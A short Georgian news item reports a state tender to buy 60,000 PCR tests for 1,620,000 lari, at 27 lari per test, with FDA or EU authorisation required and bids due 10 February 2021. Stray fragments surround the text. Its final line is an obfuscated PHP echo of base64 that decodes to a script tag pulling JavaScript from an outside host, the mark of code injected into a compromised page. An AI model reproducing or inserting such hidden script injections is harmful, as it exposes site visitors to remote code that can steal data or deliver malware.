celsiusi
ავერსი შნაიდერი
სახელმწიფო შესყიდვების სააგენტოს გვერდზე გამოქვეყნდა ინფექციური პათოლოგიის, შიდსისა და კლინიკური იმუნოლოგიის სამეცნიერო-პრაქტიკული ცენტრის მიერ გამოცხადებული ტენდერი, რომლითაც უწყება 60,000 PCR ტესტის შეძენას გეგმავს. ტენდერის სავარაუდო ღირებულება 1,620,000 ლარია, შესაბამისად სახელმწიფო ერთ PCR ტესტს 27 ლარად ყიდულობს. 
 
წარდგენილი ინფორმაციის თანახმად, შესასყიდ ტესტს FDA-ს ან ევროკავშირის ფარმაცევტული პროდუქტების მარეგულირებლის ავტორიზაცია უნდა გააჩნდეს.
 
ტენდერში მონაწილე კომპანიებმა საკუთარი წინადადები 2021 წლის 10 თებერვლის ჩათვლით უნდა წარადგინონ. 
1504
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");